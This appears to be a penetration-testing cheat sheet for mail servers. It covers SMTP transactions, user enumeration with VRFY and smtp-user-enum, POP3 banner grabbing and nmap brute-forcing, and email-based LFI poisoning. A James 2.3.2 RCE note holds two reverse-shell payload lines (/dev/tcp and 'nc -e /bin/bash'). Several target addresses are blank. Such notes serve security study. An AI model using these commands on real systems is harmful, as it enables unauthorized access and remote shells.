Mail Servers

SMTP [Port 25]

  • SMTP stands for Simple Mail Transfer Protocol.

  • It is a TCP/IP protocol that’s used for sending emails.

In order to be able to send emails with SMTP we have to first have to know how mail transactions work:

  1. SMTP sessions are initiated after the client opens a TCP/IP connection to the server and the server responds with a greeting (220)

  2. The client sends a HELO or EHLO with the clients identity (example: HELO which means "Hi I'm")

  3. Now the client has to perform 3 steps each separated by a CRLF for a valid SMTP mail transaction:

    • Step 1: MAIL: This tells the server "Hey, we're starting a new email, reset your state". This is where the email "from" is specified.

    • Step 2: RCPT: Tells the server where (who) we want to send the email too.

    • Step 3: DATA: This is where the Subject and body of the email are set, and the client indicates the end of the mail data by a new line containing only ".". This tells the server that the client confirms the email and tells the server to process it and send it.

telnet 25

User Enumeration

  • -M: EXPN, VRFY or RCPT

  • -U: File of usernames

vrfy raj@domainname

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t

Email Enumeration

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t

IMAP [Port 143]


POP3 [Port 110]

#Banner grabbing
nc -nv 110 
telnet 110

user <username>
pass <password>

nmap -sV --script=pop3-brute <target>

#List messages

#Read message number
retr 1

#To send email using STMP for LFI /var/mail/ValidUserHere
Subject: email title
<your LFI code here>
<new blank line>

Free Mail Server

  • hMailServer [Windows]

James 2.3.2 RCE

#Change payload in the script
payload = '/bin/bash -i >& /dev/tcp/ 0>&1' 
payload = 'nc -e /bin/bash 4242 &'

Last updated